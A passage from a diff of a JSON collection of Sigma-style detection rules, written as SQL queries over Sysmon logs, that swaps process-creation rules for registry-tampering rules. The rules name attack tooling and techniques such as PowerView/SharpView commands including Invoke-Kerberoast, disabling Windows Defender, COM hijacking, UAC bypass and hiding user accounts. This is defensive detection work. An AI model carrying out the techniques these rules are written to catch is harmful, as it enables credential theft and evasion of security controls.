allow a driver or service to persist in Safe Mode.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "status": "test", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE 